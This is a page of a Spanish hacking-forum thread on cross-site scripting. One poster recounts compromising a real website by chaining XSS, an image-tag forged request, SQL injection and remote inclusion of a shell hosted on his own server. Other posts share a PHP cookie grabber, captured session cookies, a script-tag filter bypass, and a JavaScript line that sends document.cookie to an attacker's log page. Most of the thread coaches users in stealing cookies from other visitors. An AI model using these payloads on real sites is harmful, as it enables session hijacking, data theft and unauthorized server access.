elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Informática
| |-+  Tutoriales - Documentación (Moderadores: r32, ehn@)
| | |-+  Los Poderes Secretos de XSS (Cross Site Scripting)
0 Usuarios y 1 Visitante están viendo este tema.
Encuesta
Pregunta: Que te pareció este manual?
Malisimo :(
Malo
No aprendí nada
Bueno
Buenisimo :)

Páginas: 1 [2] 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: Los Poderes Secretos de XSS (Cross Site Scripting)  (Leído 69,615 veces)
sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #10 en: 16 Enero 2006, 09:57 am »

XSS + SQL Iny + RFI

Encontré una Web que gracias a un bug de XSS econtre un SQL Inyection y despues un RFI, porque digo esto?
para poner como ejemplo que XSS si es un asunto serio.

El XSS se encontraba en un TAG Board, que esta en todas las web a las que entras en el sitio, es parecido a php_nuke.
lo unico que hice con mi script, es notificarme a cuales páginas entraban los usuarios, y guardaba todos los submits en cookies para despues mandarlas a mi log tambien.
(El robo de cookies no funcionaba, el sistema guardaba la ip en la sesión)
yo esperaba que el admin pusiera su pass, y listo :P, pero nunca paso esto.. :(, consegui de muchos usuarios mortales, talvez el admin ya tenia iniciada su sesion con cookies.. y no podia cerrarsela, porque tenia limite de longitud mi bug.
SIN embargo, aun sin conseguir el pass de admin sabia a que paginas entraba este.. era muy facil saberlo, porque todas estaban en la carpeta /admin/
Despues de andar monitoreando sus movimientos un buen rato, vi que cuando entraba a poner una noticia, se enviaba en Post un numero.
Si tuviera acceso a ese documento sin ser admin, me hubiera ahorrado muchos problemas, pero pues.. como la ven que no.
El script, no lo podia modificar, ni podia poner otro, asi que debia encontrar una manera de enviar la información.
El antiguo bug de GET=POST en php, me ayudo.
Este sitio tenia foro, asi que lo unico que debi hacer fue:
(Modificado obvio!!)
Código:
Hola, me podrias orientar sobre como ser administraor de este foro?

Saludos
::wink::[img]http://site.com/admin/news.php?nid='&tno=abc&mno=abc&tn=23[/img]

nid es donde se guardaba el numero, tno el titulo mno es el mensaje y tn es el tema, lo puse en el ultimo para que no llamara la atencion.

Si se creaba la noticia era porque no habia inyección, si no se creaba, era porque si habia.

Ahora, esto parece una inyección mas dificil que un blind no? jaja
ahi fue donde entro el RFI.
Al parecer si habia inyección SQL, pero no se como diablos estabala sentencia que se creo la noticia, pero en el titulo se guardo (modificado):
Citar
Warning: Invalid Socket Stream /news/23th.php
ese 23 es de el tema, :P
Solo tuve que mandar otro MP al admin, ahora preguntandole, porque no me respondio mi post de quiero ser admin xD.
pero ahora con esta imagen:
Código:
http://site.com/admin/news.php?nid='&tno=abc&mno=abc&tn=http%3A//miserv.com/rfi/sh.txt?
el ? del final es porque el script agrega th.php al final
:P listo, ahora entraba con method POST y una variable en un formulario ya diseñado a:
http://site.com/index.php
y se creaba una consola de shell.
NO hice deface. yo estoy encontra de los defaces.
no es la gran cosa, es como cualquier 0wn3d, pero quize publicarlo, porque se me hizo gracioso, como este ataque fue de un tipo a otro, sin quererlo realmente.

Este sistema web es independiente, pero dicen que lo quieren vender jeje, si lo saca.. tendra los primeros 3 bug a los 15 segundos xD


Saludos!!


En línea

deceiver

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #11 en: 16 Marzo 2006, 20:59 pm »

Porque solo me guarda esto y no la cookie entera??

USUARIO Y PASSWORD:
Cookie: BSUID=1; ASLTRG1=28
Pagina:
IP: 212.78.xxx.xxx
Fecha y Hora: 16 March, 2006, 8:50 pm


y solo guarda si abro la web si la abre otro nada  estoy usando hosting lycos (nose si sera por eso)
probe con otro cookie grabber y solo me guardaba si la abria yo tambien pero grababa todo.. el otro es:

<?php
cookie=$_REQUEST['cookie'];
$openfile = fopen("cookies.txt", "a");
fwrite($openfile, "$cookie\n");
fclose($openfile);
?>



« Última modificación: 16 Marzo 2006, 21:09 pm por deceiver » En línea

sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #12 en: 17 Marzo 2006, 00:01 am »

deceiver:
¿como es la cookie completa?

Saludos!!
En línea

deceiver

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #13 en: 17 Marzo 2006, 00:54 am »

ESta es la cookie entera.

hhr=4347; BSUID=1; FRQSTR=19042219|19042219|19042219|19042219|19042219; WIDYMD=#30554:FCP#; KIDYMD=#225393:FCPB#202979:FCGC#202984:FCFA#231288:FBDA#; ASLTRG1=28#24#.es#604#1335#.inversas.jazztel.es#62.14.155.30#es##-9718#1334#1229#0#0

algo asi pero esque si la abre alguien que no sea yo nisiquiera guarda el principio¿porque puede ser? alguna idea?

gracias, un saludo

Encontre otro cookie grabber que funciona bien pero me guarda un trozo o otro aqui 3 diferentes que me guardo

FRQSTR=19042251|19042251|19042251|19042251|19042251; ASLTRG1=28


 BSUID=1; FRQSTR=19012244x202979:1:5108|19012244|19012244|19012244|19012244; WIDYMD=



FRQSTR=18802497|18802497|18802497|18802497|18802497

en ninguna me la guarda entera pero al menos con este guarda un trozo aunque no la abra yo.. el 19042251|19042251|19042251|19042251|19042251 deduzco que sera la password ¿porque puede ser SirdarckCat?
« Última modificación: 18 Marzo 2006, 00:05 am por deceiver » En línea

sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #14 en: 20 Marzo 2006, 08:28 am »

asegurate de que antes de enviar el valor de la cookie, le hagas un escape, escape(document.cookie).. :/

Saludos!!
En línea

deceiver

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #15 en: 21 Marzo 2006, 00:55 am »

Era eso muchas gracias.. :)

una ultima cosa las cookies son algo raras usan KIDYMD=* e visto muchos blogs busandolo pero no veo nada en md5  y no encuentro nada de info sobre esto ¿sabes que es esto? gracias

solo encontre blogs y cosas asi con KIDYMD= y demas.. y buscando encontre esto http://users.cjb.net/ebaumcookies/noip.txt ^^
cookies de ebaum o algo asi en las mayorias esta el KIDYMD pero suele estar la pw en md5 y en la mia no :%

Espero tu respuesta un saludo :)
« Última modificación: 21 Marzo 2006, 01:30 am por deceiver » En línea

sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #16 en: 21 Marzo 2006, 08:13 am »

En eso ya no te pudo ayudar xD, te toca a ti, ver que hace.. mucha suerte!!
En línea

sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #17 en: 24 Marzo 2006, 16:50 pm »

Lamentables estos filtros sugeridos por usuarios de php.net:

http://72.14.203.104/search?q=cache:P6cmiyv-2GIJ:www.php.net/strpos&hl=es&gl=mx&ct=clnk&cd=1
http://www.php.net/strpos

se saltan todos asi:
<sCripT >/*<scriPt >/**/alert();</scrIpt >

xD
En línea

xDie


Desconectado Desconectado

Mensajes: 326


lol


Ver Perfil
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #18 en: 13 Julio 2006, 21:56 pm »

Todavia no entendido muy bien, ya tengo mi log.php y un log2.htm. si yo quiero la cookie de alguien le mando que entre a www.misitio.com/log.php  ????
o que debo hacer?? y que cookie me guarda???
Gracias!!! ;D
En línea

Licence to kill!
sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #19 en: 15 Julio 2006, 00:24 am »

no.. lee el manual otra ves ;)
debes encontrar un bug de XSS en la web, y colocar un codigo masomenos asi:
Código:
self.location.href='http://misitio.com/log.php?c='+escape(document.cookie);
eso debe mandarte la cookie.. del sitio afectado.

saludos!!
En línea

Páginas: 1 [2] 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Cross Site Scripting (XSS)
Nivel Web
yeikos 3 6,885 Último mensaje 28 Mayo 2007, 05:59 am
por Man-In-the-Middle
Cross Site Scripting en Myspace.com
Nivel Web
keype 6 4,974 Último mensaje 26 Abril 2007, 18:15 pm
por Crack_X
Cross Site Scripting « 1 2 »
Nivel Web
berni69 11 8,576 Último mensaje 20 Julio 2007, 16:24 pm
por Tengu
Cross Site Scripting
Nivel Web
pelonms7 6 6,604 Último mensaje 7 Marzo 2011, 03:20 am
por pelonms7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines